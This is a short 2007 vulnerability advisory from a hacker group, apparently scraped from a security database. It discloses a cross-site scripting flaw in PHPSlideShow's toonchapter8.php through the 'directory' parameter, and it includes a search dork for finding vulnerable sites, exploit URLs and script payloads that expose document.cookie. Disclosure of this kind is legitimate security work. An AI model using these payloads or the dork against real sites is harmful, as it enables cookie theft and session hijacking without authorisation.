Lucene search
SecurityvulnsSECURITYVULNS:DOC:18499HistoryNov 26, 2007 - 12:00 a.m.
PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability
2007-11-2600:00:00
vulners.com
23
PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability
Download:
http://fmdeluxe.com/
Bug found by Jose Luis Gуngora Fernбndez / JosS
Contact: sys-project[at]hotmail.com
Spanish Hackers Team
www.spanish-hackers.com
/server irc.freenode.net /join #fullsecure
d0rk: "Powered by PHPSlideShow"
Stop lammer
Exploit In (XSS):
…/PATH/toonchapter8.php?directory=[XSS]
http://www.example.com/PATH/toonchapter8.php?directory=[XSS]
Cross Siting Scripting (Code):
"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
//---------------------------------------\\
Greetz To: All Hackers
Jose Luis Gуngora Fernбndez / JosS!